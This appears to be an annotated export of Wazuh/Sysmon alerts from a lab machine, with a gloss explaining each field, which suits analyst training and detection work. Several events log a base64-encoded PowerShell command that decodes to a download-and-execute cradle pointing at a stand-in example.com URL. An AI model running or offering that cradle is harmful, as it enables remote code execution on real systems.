data.win.eventdata.utcTime: 2025-04-24 22:35:34.965 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4kimfx2r.qot.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:34.965 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.894465 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:37.4234296Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282035 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:36.031
ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00}
ProcessId: 13524
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00}
ParentProcessId: 6588
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:36.031 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb8-680a-a00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 6588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.902531 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:37.5822494Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282037 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:37.562
ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00}
ProcessId: 13524
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_lrtfiacg.ym4.ps1
CreationUtcTime: 2025-04-24 22:35:37.562
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:37.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb8-680a-a00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_lrtfiacg.ym4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:37.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534212.905299 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:38.3328294Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43822 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 2060 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534212.912635 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:39.6375414Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282075 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:38.125
ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00}
ProcessId: 12600
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00}
ParentProcessId: 13524
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:38.125 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcba-680a-a30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534212.920705 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
